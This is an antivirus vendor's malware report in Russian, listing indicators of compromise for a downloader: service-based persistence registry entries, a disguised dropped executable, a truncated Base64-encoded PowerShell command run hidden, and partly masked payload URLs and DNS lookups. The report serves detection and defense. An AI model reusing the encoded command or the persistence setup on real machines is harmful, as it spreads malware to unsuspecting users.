Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msvcr120_clr0400] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msvcr120_clr0400] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData0013\msvcr120_clr0400.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEkAQQBDAEwAawBnAHQAPQAnAEcARABOAEsAWABlAHAAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBgAEkAVABgAHkAUABSAG8AVABvAGMATwBsACIAIAA9AC...
- %HOMEPATH%\376.exe
- %HOMEPATH%\376.exe
- %HOMEPATH%\376.exe в %WINDIR%\syswow64\nlsdata0013\msvcr120_clr0400.exe
- %HOMEPATH%\376.exe
- '76.##.179.47':80
- http://st#####omotions.co.uk/files/0swfh_d7_3wqdwymn00/
- http://st#####omotions.co.uk/cgi-sys/suspendedpage.cgi
- http://to####andtalk.com/wp-content/d4wa_m9_8u5yii2j/
- http://fi###tones.dk/blogs/mxa61_d_ys8fqozh/
- http://lu##ybit.jp/o/e_hzu0_hlyygcbr9u/
- http://76.##.179.47/VFBZ/Zzv8B/w7TDMxsc694WL7Z0/ixi8Lbap0RFI6NuL5T1/WjW1t3C/
- DNS ASK ur###eden.net
- DNS ASK st#####omotions.co.uk
- DNS ASK to####andtalk.com
- DNS ASK fi###tones.dk
- DNS ASK lu##ybit.jp
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEkAQQBDAEwAawBnAHQAPQAnAEcARABOAEsAWABlAHAAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBgAEkAVABgAHkAUABSAG8AVABvAGMATwBsACIAIAA9AC...' (со скрытым окном)